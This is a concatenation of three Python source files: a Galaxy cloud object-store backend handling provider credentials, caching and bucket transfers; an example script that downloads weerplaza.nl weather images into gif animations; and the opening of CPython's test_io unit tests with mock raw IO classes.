NO_CLOUDBRIDGE_ERROR_MESSAGE = (
"Cloud ObjectStore is configured, but no CloudBridge dependency available."
"Please install CloudBridge or modify ObjectStore configuration."
)
class CloudConfigMixin:
def _config_to_dict(self):
return {
"provider": self.provider,
"auth": self.credentials,
"bucket": {
"name": self.bucket_name,
"use_reduced_redundancy": self.use_rr,
},
"connection": {
"host": self.host,
"port": self.port,
"multipart": self.multipart,
"is_secure": self.is_secure,
"conn_path": self.conn_path,
},
"cache": {
"size": self.cache_size,
"path": self.staging_path,
}
}
class Cloud(ConcreteObjectStore, CloudConfigMixin):
"""
Object store that stores objects as items in a cloud storage. A local
cache exists that is used as an intermediate location for files between
Galaxy and the cloud storage.
"""
store_type = 'cloud'
def __init__(self, config, config_dict):
super().__init__(config, config_dict)
self.transfer_progress = 0
bucket_dict = config_dict['bucket']
connection_dict = config_dict.get('connection', {})
cache_dict = config_dict['cache']
self.provider = config_dict["provider"]
self.credentials = config_dict["auth"]
self.bucket_name = bucket_dict.get('name')
self.use_rr = bucket_dict.get('use_reduced_redundancy', False)
self.max_chunk_size = bucket_dict.get('max_chunk_size', 250)
self.host = connection_dict.get('host', None)
self.port = connection_dict.get('port', 6000)
self.multipart = connection_dict.get('multipart', True)
self.is_secure = connection_dict.get('is_secure', True)
self.conn_path = connection_dict.get('conn_path', '/')
self.cache_size = cache_dict.get('size', -1)
self.staging_path = cache_dict.get('path') or self.config.object_store_cache_path
self._initialize()
def _initialize(self):
if CloudProviderFactory is None:
raise Exception(NO_CLOUDBRIDGE_ERROR_MESSAGE)
self.conn = self._get_connection(self.provider, self.credentials)
self.bucket = self._get_bucket(self.bucket_name)
# Clean cache only if value is set in galaxy.ini
if self.cache_size != -1:
# Convert GBs to bytes for comparison
self.cache_size = self.cache_size * 1073741824
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
self.cache_monitor_thread.start()
log.info("Cache cleaner manager started")
# Test if 'axel' is available for parallel download and pull the key into cache
try:
subprocess.call('axel')
self.use_axel = True
except OSError:
self.use_axel = False
@staticmethod
def _get_connection(provider, credentials):
log.debug(f"Configuring `{provider}` Connection")
if provider == "aws":
config = {"aws_access_key": credentials["access_key"],
"aws_secret_key": credentials["secret_key"]}
connection = CloudProviderFactory().create_provider(ProviderList.AWS, config)
elif provider == "azure":
config = {"azure_subscription_id": credentials["subscription_id"],
"azure_client_id": credentials["client_id"],
"azure_secret": credentials["secret"],
"azure_tenant": credentials["tenant"]}
connection = CloudProviderFactory().create_provider(ProviderList.AZURE, config)
elif provider == "google":
config = {"gcp_service_creds_file": credentials["credentials_file"]}
connection = CloudProviderFactory().create_provider(ProviderList.GCP, config)
else:
raise Exception(f"Unsupported provider `{provider}`.")
# Ideally it would be better to assert if the connection is
# authorized to perform operations required by ObjectStore
# before returning it (and initializing ObjectStore); hence
# any related issues can be handled properly here, and ObjectStore
# can "trust" the connection is established.
#
# However, the mechanism implemented in Cloudbridge to assert if
# a user/service is authorized to perform an operation, assumes
# the user/service is granted elevated privileges, such
# as admin/owner-level access to all resources. For a detailed
# discussion see:
#
# https://github.com/CloudVE/cloudbridge/issues/135
#
# Hence, if a resource owner wants to only authorize Galaxy to r/w
# a bucket/container on the provider, but does not allow it to access
# other resources, Cloudbridge may fail asserting credentials.
# For instance, to r/w an Amazon S3 bucket, the resource owner
# also needs to authorize full access to Amazon EC2, because Cloudbridge
# leverages EC2-specific functions to assert the credentials.
#
# Therefore, to adhere to the principle of least privilege, we do not
# assert credentials; instead, we handle exceptions raised as a
# result of signing API calls to cloud provider (e.g., GCP) using
# incorrect, invalid, or unauthorized credentials.
return connection
@classmethod
def parse_xml(clazz, config_xml):
# The following reads common cloud-based storage configuration
# as implemented for the S3 backend. Hence, it also attempts to
# parse S3-specific configuration (e.g., credentials); however,
# such provider-specific configuration is overwritten in the
# following.
config = parse_config_xml(config_xml)
try:
provider = config_xml.attrib.get("provider")
if provider is None:
msg = "Missing `provider` attribute from the Cloud backend of the ObjectStore."
log.error(msg)
raise Exception(msg)
provider = provider.lower()
config["provider"] = provider
# Read any provider-specific configuration.
auth_element = config_xml.findall("auth")[0]
missing_config = []
if provider == "aws":
akey = auth_element.get("access_key")
if akey is None:
missing_config.append("access_key")
skey = auth_element.get("secret_key")
if skey is None:
missing_config.append("secret_key")
config["auth"] = {
"access_key": akey,
"secret_key": skey}
elif provider == "azure":
sid = auth_element.get("subscription_id")
if sid is None:
missing_config.append("subscription_id")
cid = auth_element.get("client_id")
if cid is None:
missing_config.append("client_id")
sec = auth_element.get("secret")
if sec is None:
missing_config.append("secret")
ten = auth_element.get("tenant")
if ten is None:
missing_config.append("tenant")
config["auth"] = {
"subscription_id": sid,
"client_id": cid,
"secret": sec,
"tenant": ten}
elif provider == "google":
cre = auth_element.get("credentials_file")
if not os.path.isfile(cre):
msg = f"The following file specified for GCP credentials not found: {cre}"
log.error(msg)
raise OSError(msg)
if cre is None:
missing_config.append("credentials_file")
config["auth"] = {
"credentials_file": cre}
else:
msg = f"Unsupported provider `{provider}`."
log.error(msg)
raise Exception(msg)
if len(missing_config) > 0:
msg = "The following configuration required for {} cloud backend " \
"are missing: {}".format(provider, missing_config)
log.error(msg)
raise Exception(msg)
else:
return config
except Exception:
log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
raise
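    # A minimal sketch (for illustration; the exact enclosing tag and the
    # common bucket/cache attributes come from the S3-style configuration
    # handled by parse_config_xml) of the XML fragment parse_xml() expects,
    # using the attribute names read above:
    #
    #   <object_store type="cloud" provider="aws">
    #       <auth access_key="..." secret_key="..."/>
    #       ...
    #   </object_store>
    #
    # For provider="azure" the <auth> element carries subscription_id,
    # client_id, secret and tenant; for provider="google" it carries
    # credentials_file.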
def to_dict(self):
as_dict = super().to_dict()
as_dict.update(self._config_to_dict())
return as_dict
def __cache_monitor(self):
time.sleep(2) # Wait for things to load before starting the monitor
while self.running:
total_size = 0
# Is this going to be too expensive of an operation to be done frequently?
file_list = []
for dirpath, _, filenames in os.walk(self.staging_path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
file_size = os.path.getsize(filepath)
total_size += file_size
                    # Get the time the given file was last accessed
last_access_time = time.localtime(os.stat(filepath)[7])
# Compose a tuple of the access time and the file path
file_tuple = last_access_time, filepath, file_size
file_list.append(file_tuple)
# Sort the file list (based on access time)
file_list.sort()
# Initiate cleaning once within 10% of the defined cache size?
cache_limit = self.cache_size * 0.9
if total_size > cache_limit:
log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
convert_bytes(total_size), convert_bytes(cache_limit))
                # How much to delete? Deleting only down to the cache-10% limit
                # would likely trigger cleaning again soon and risk hitting the
                # limit - maybe delete an additional percentage?
                # For now, delete enough to leave at least 10% of the total cache free.
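                # Worked example (a sketch, assuming a hypothetical cache_size
                # of 100 GB): cache_limit is 90 GB, so once total_size reaches,
                # say, 95 GB, delete_this_much is 5 GB and __clean_cache removes
                # the least recently accessed files until that much is freed.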
delete_this_much = total_size - cache_limit
self.__clean_cache(file_list, delete_this_much)
self.sleeper.sleep(30) # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
should be sorted accordingly. The list must contains 3-element tuples,
positioned as follows: position 0 holds file last accessed timestamp
(as time.struct_time), position 1 holds file path, and position 2 has
        file size (e.g., (<access time>, '/mnt/data/dataset_1.dat', 472394)).
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
        for entry in file_list:
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
def _get_bucket(self, bucket_name):
try:
bucket = self.conn.storage.buckets.get(bucket_name)
if bucket is None:
log.debug("Bucket not found, creating a bucket with handle '%s'", bucket_name)
bucket = self.conn.storage.buckets.create(bucket_name)
log.debug("Using cloud ObjectStore with bucket '%s'", bucket.name)
return bucket
except InvalidNameException:
log.exception("Invalid bucket name -- unable to continue")
raise
except Exception:
# These two generic exceptions will be replaced by specific exceptions
# once proper exceptions are exposed by CloudBridge.
log.exception(f"Could not get bucket '{bucket_name}'")
            raise
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
if os.path.islink(path):
continue
umask_fix_perms(path, self.config.umask, 0o666, self.config.gid)
def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None,
obj_dir=False, **kwargs):
# extra_dir should never be constructed from provided data but just
        # make sure there are no shenanigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name:
if not safe_relpath(alt_name):
log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
# alt_name can contain parent directory references, but S3 will not
# follow them, so if they are valid we normalize them out
alt_name = os.path.normpath(alt_name)
rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj)))
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# for JOB_WORK directory
if obj_dir:
rel_path = os.path.join(rel_path, str(self._get_object_id(obj)))
if base_dir:
base = self.extra_dirs.get(base_dir)
return os.path.join(base, rel_path)
# S3 folders are marked by having trailing '/' so add it now
rel_path = f'{rel_path}/'
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else f"dataset_{self._get_object_id(obj)}.dat")
return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
return self.transfer_progress
def _get_size_in_cloud(self, rel_path):
try:
obj = self.bucket.objects.get(rel_path)
if obj:
return obj.size
except Exception:
log.exception("Could not get size of key '%s' from S3", rel_path)
return -1
def _key_exists(self, rel_path):
exists = False
try:
# A hackish way of testing if the rel_path is a folder vs a file
is_dir = rel_path[-1] == '/'
if is_dir:
keyresult = self.bucket.objects.list(prefix=rel_path)
if len(keyresult) > 0:
exists = True
else:
exists = False
else:
exists = True if self.bucket.objects.get(rel_path) is not None else False
except Exception:
log.exception("Trouble checking existence of S3 key '%s'", rel_path)
return False
        if rel_path[0] == '/':
            raise ValueError(f"rel_path must be relative, not absolute: {rel_path}")
return exists
def _in_cache(self, rel_path):
""" Check if the given dataset is in the local cache and return True if so. """
# log.debug("------ Checking cache for rel_path %s" % rel_path)
cache_path = self._get_cache_path(rel_path)
return os.path.exists(cache_path)
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
def _transfer_cb(self, complete, total):
self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.objects.get(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
                ret_code = subprocess.call(["axel", "-a", "-n", str(ncores), url])
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
                with open(self._get_cache_path(rel_path), "wb+") as downloaded_file_handle:
key.save_content(downloaded_file_handle)
return True
except Exception:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
"""
Push the file pointed to by ``rel_path`` to the object store naming the key
``rel_path``. If ``source_file`` is provided, push that file instead while
still using ``rel_path`` as the key name.
If ``from_string`` is provided, set contents of the file to the value of
the string.
"""
try:
source_file = source_file if source_file else self._get_cache_path(rel_path)
if os.path.exists(source_file):
if os.path.getsize(source_file) == 0 and (self.bucket.objects.get(rel_path) is not None):
log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file,
rel_path)
return True
if from_string:
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
                        created_obj.upload(from_string)
else:
                        self.bucket.objects.get(rel_path).upload(from_string)
log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
else:
start_time = datetime.now()
log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file,
os.path.getsize(source_file), rel_path)
self.transfer_progress = 0 # Reset transfer progress counter
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
created_obj.upload_from_file(source_file)
else:
self.bucket.objects.get(rel_path).upload_from_file(source_file)
end_time = datetime.now()
log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
return True
else:
log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
rel_path, source_file)
except Exception:
log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
return False
def file_ready(self, obj, **kwargs):
"""
A helper method that checks if a file corresponding to a dataset is
ready and available to be used. Return ``True`` if so, ``False`` otherwise.
"""
rel_path = self._construct_path(obj, **kwargs)
# Make sure the size in cache is available in its entirety
if self._in_cache(rel_path):
if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_cloud(rel_path):
return True
log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_cloud(rel_path))
return False
def _exists(self, obj, **kwargs):
in_cache = False
rel_path = self._construct_path(obj, **kwargs)
# Check cache
if self._in_cache(rel_path):
in_cache = True
# Check cloud
in_cloud = self._key_exists(rel_path)
# log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
# dir_only does not get synced so shortcut the decision
dir_only = kwargs.get('dir_only', False)
base_dir = kwargs.get('base_dir', None)
if dir_only:
if in_cache or in_cloud:
return True
# for JOB_WORK directory
elif base_dir:
if not os.path.exists(rel_path):
os.makedirs(rel_path)
return True
else:
return False
# TODO: Sync should probably not be done here. Add this to an async upload stack?
if in_cache and not in_cloud:
self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
return True
elif in_cloud:
return True
else:
return False
def _create(self, obj, **kwargs):
if not self._exists(obj, **kwargs):
# Pull out locally used fields
extra_dir = kwargs.get('extra_dir', None)
extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
dir_only = kwargs.get('dir_only', False)
alt_name = kwargs.get('alt_name', None)
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj)))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# Create given directory in cache
cache_dir = os.path.join(self.staging_path, rel_path)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else f"dataset_{self._get_object_id(obj)}.dat")
open(os.path.join(self.staging_path, rel_path), 'w').close()
self._push_to_os(rel_path, from_string='')
def _empty(self, obj, **kwargs):
if self._exists(obj, **kwargs):
            return bool(self._size(obj, **kwargs) == 0)
else:
raise ObjectNotFound('objectstore.empty, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def _size(self, obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
if self._in_cache(rel_path):
try:
return os.path.getsize(self._get_cache_path(rel_path))
except OSError as ex:
log.info("Could not get size of file '%s' in local cache, will try cloud. Error: %s", rel_path, ex)
elif self._exists(obj, **kwargs):
return self._get_size_in_cloud(rel_path)
log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
return 0
def _delete(self, obj, entire_dir=False, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
try:
            # Remove temporary data in the JOB_WORK directory
if base_dir and dir_only and obj_dir:
shutil.rmtree(os.path.abspath(rel_path))
return True
# For the case of extra_files, because we don't have a reference to
# individual files/keys we need to remove the entire directory structure
# with all the files in it. This is easy for the local file system,
            # but requires iterating through each individual key in S3 and deleting it.
if entire_dir and extra_dir:
shutil.rmtree(self._get_cache_path(rel_path))
results = self.bucket.objects.list(prefix=rel_path)
for key in results:
log.debug("Deleting key %s", key.name)
key.delete()
return True
else:
# Delete from cache first
os.unlink(self._get_cache_path(rel_path))
# Delete from S3 as well
if self._key_exists(rel_path):
key = self.bucket.objects.get(rel_path)
log.debug("Deleting key %s", key.name)
key.delete()
return True
except Exception:
log.exception("Could not delete key '%s' from cloud", rel_path)
except OSError:
log.exception('%s delete error', self._get_filename(obj, **kwargs))
return False
def _get_data(self, obj, start=0, count=-1, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Check cache first and get file if not there
if not self._in_cache(rel_path):
self._pull_into_cache(rel_path)
# Read the file content from cache
data_file = open(self._get_cache_path(rel_path))
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def _get_filename(self, obj, **kwargs):
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
rel_path = self._construct_path(obj, **kwargs)
# for JOB_WORK directory
if base_dir and dir_only and obj_dir:
return os.path.abspath(rel_path)
cache_path = self._get_cache_path(rel_path)
# S3 does not recognize directories as files so cannot check if those exist.
# So, if checking dir only, ensure given dir exists in cache and return
# the expected cache path.
# dir_only = kwargs.get('dir_only', False)
# if dir_only:
# if not os.path.exists(cache_path):
# os.makedirs(cache_path)
# return cache_path
# Check if the file exists in the cache first
if self._in_cache(rel_path):
return cache_path
# Check if the file exists in persistent storage and, if it does, pull it into cache
elif self._exists(obj, **kwargs):
if dir_only: # Directories do not get pulled into cache
return cache_path
else:
if self._pull_into_cache(rel_path):
return cache_path
# For the case of retrieving a directory only, return the expected path
# even if it does not exist.
# if dir_only:
# return cache_path
raise ObjectNotFound('objectstore.get_filename, no cache_path: %s, kwargs: %s'
% (str(obj), str(kwargs)))
# return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def _update_from_file(self, obj, file_name=None, create=False, **kwargs):
if create:
self._create(obj, **kwargs)
if self._exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
            # Choose whether to use the dataset file itself or an alternate file
if file_name:
source_file = os.path.abspath(file_name)
# Copy into cache
cache_file = self._get_cache_path(rel_path)
try:
if source_file != cache_file:
# FIXME? Should this be a `move`?
shutil.copy2(source_file, cache_file)
self._fix_permissions(cache_file)
except OSError:
log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
else:
source_file = self._get_cache_path(rel_path)
# Update the file on cloud
self._push_to_os(rel_path, source_file)
else:
raise ObjectNotFound('objectstore.update_from_file, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def _get_object_url(self, obj, **kwargs):
if self._exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
try:
key = self.bucket.objects.get(rel_path)
return key.generate_url(expires_in=86400) # 24hrs
except Exception:
log.exception("Trouble generating URL for dataset '%s'", rel_path)
return None
def _get_store_usage_percent(self):
return 0.0
|
weerplaza_eg.py
|
# -*- coding: utf-8 -*-
'''This file contains examples of how to use the functions from the anim library
for downloading images from weerplaza.nl'''
__author__ = 'Mark Zwaving'
__email__ = 'markzwaving@gmail.com'
__copyright__ = 'Copyright (C) Mark Zwaving. All rights reserved.'
__license__ = 'MIT License'
__version__ = '0.0.7'
__maintainer__ = 'Mark Zwaving'
__status__ = 'Development'
# Python version > 3.7 (f-strings)
import common.config as cfg # Configuration defaults. See config.py
import common.model.animation as anim # import animation library
import threading, time # Multi processing and time
# Example download image urls from weerplaza
url_base_10min = 'https://oud.weerplaza.nl/gdata/10min' # Base url 10min
url_t10cm = f'{url_base_10min}/GMT_T10C_latest.png' # Temp 10cm
url_weerbeeld = f'{url_base_10min}/nl_10min.jpg' # Weerbeeld
url_t2meter = f'{url_base_10min}/GMT_TTTT_latest.png' # Temp 2 meter
def weerplaza_10min(url, verbose=None):
    '''Easy wrapper function for interval downloading of images, using default
    values from config.py.'''
    anim.interval_download_animation( url, # Download url
        download_map = cfg.dir_download, # Folder to download the images to
        animation_map = cfg.dir_animation, # Folder for the animations
        animation_name = '', # The path/name of the animation file
        interval_download = 10, # Interval time for downloading images (minutes)
        duration_download = 60, # Total time for downloading all the images (minutes)
        animation_time = 0.7, # Animation interval time for the gif animation
        remove_download = False, # Remove the downloaded images
        gif_compress = True, # Compress the size of the animation
        date_submap = True, # Set True to create extra date subfolders
        date_subname = True, # Set True to add the date to file names
        check = False, # No double-download check
        verbose = verbose # Overwrite verbose -> see config.py
    )
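# Usage (sketch): weerplaza_10min(url_t10cm) downloads the 10 cm temperature
# image every 10 minutes for an hour and builds a gif animation in
# cfg.dir_animation, using the defaults set in the wrapper above.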
if __name__ == "__main__":
############################################################################
# Weerplaza eg: 10 minutes refresh images
# EG. Temp 2 meter
# interval_download_animation( url_t2meter, # Give a downloadurl
# download_map = cfg.dir_download, # Map for downloading the images too
# animation_map = cfg.dir_animation, # Map for the animations
# animation_name = '', # The path/name of the animation file
# interval_download = 10, # Interval time for downloading Images (minutes)
# duration_download = 60, # Total time for downloading all the images (minutes)
# animation_time = 0.7, # Animation interval time for gif animation
# remove_download = False, # Remove the downloaded images
# gif_compress = True, # Compress the size of the animation
# date_submap = True, # Set True to create extra date submaps
# date_subname = True, # Set True to create extra date in files
# check = True, # No double downloads check
# verbose = None # Overwrite verbose -> see config.py
# )
# See above
# anim time, rm downloads, compress gif, date submap, date subname, check download, verbose
at, rm, cp, ds, dn, ck, vb = 0.7, False, True, True, True, True, True
dm, am = cfg.dir_download, cfg.dir_animation # Base maps (shortened)
nm = 'wp_animation_temp.gif' # Name file
it = 10 # interval time (minutes)
du = 10 # duration time (minutes)
anim.interval_download_animation(url_t2meter, dm, am, nm, it, du, at, rm, cp, ds, dn, ck, vb)
# ############################################################################
# # Example multi processing. Download multiple images at the same time
#
# # Clock timer set to False. Cannot have multiple timers at the same time
# cfg.timer = False # Timer is off (=false)
#
# # Start 3 threads for downloading three images at the same time
# for url in [ url_t10cm, url_weerbeeld, url_t2meter ]: # Three images for downloading
# threading.Thread( target=weerplaza_10min, args=(url,) ).start() # Start new process
#     time.sleep(30) # Start the next thread after 30 seconds
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
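# For illustration, a minimal sketch of that pattern (hypothetical ExampleTest
# name; the concrete tests below follow the same shape): the base class refers
# to the implementation only through attributes such as self.BytesIO, and the
# C/Python subclasses bind those attributes to the io and _pyio modules
# imported below.
#
#     class ExampleTest(unittest.TestCase):
#         def test_roundtrip(self):
#             buf = self.BytesIO()
#             buf.write(b"data")
#             self.assertEqual(buf.getvalue(), b"data")
#
#     class CExampleTest(ExampleTest):
#         BytesIO = io.BytesIO
#
#     class PyExampleTest(ExampleTest):
#         BytesIO = pyio.BytesIO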
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import sysconfig
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
'-fsanitize=memory' in _cflags or
'--with-memory-sanitizer' in _config_args
)
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
